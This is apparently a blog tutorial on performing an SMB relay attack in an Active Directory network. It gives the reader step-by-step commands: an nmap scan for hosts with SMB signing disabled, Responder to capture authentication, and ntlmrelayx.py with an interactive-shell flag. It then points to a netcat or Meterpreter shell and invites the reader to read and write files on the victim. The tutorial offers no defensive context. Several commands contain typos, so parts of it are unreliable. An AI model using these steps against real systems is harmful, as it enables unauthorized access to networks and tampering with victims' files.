SMB Relay Attack To Gain Shell

In Summary: Simple SMB Relay Attack can help you get a shell in Active Directory (AD) Environment

So What is SMB in the first place?

Short Answer “out of paper” alert you receive on your computer when trying to print a document is the work of the SMB protocol.

The Server Message Block (SMB) protocol is a network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network.

So as one can guess MITM is possible here granted you are in the network.

How does it work ? ?

Well, you need 3 things for SMB relay attack :

1. Network access you must be in the network

2. Responder.py and ntlmrelayx.py

3. And last but not least a victim with SMB signing Disabled

5 simple steps to gain shell from SMB Relay Attack

Step 1 : First We need to discover a target whose SMB Singing is disabled. Enabled but necessary also works fine. So let's run the old trusted nmap to discover that. Alternatively, you can run nessus for your own script for this too.

“nmap script=smb2-security-mode.nse -p 445 192.168.57.0/24”

Step 2 : Let’s put those in our targtes.txt so that we can use them with ntlmrelaxy.py. And now let's run our old responder. Remember to turn off HTTP and SMB servers from config for of responder before running command.

“responder -I eth0 -rdwv”

STEP 3 : Run the ntlmrelayx.py on targets.txt with the flag -i to get the interactive shell

“ntlmrelayx.py -tf targets.txt -smb2support -i”

STEP 4 : Wait for victim request, which on the victim side will look like this

And viola you will get the SMB Shell. It will look something like this on your side.

STEP 5 : Get the shell on netcat via the address you get. Alternatively, you can also get a Meterpreter shell with little tweaks

That's it now go around and do the stuff you like you can write or read files with this shell and do much more.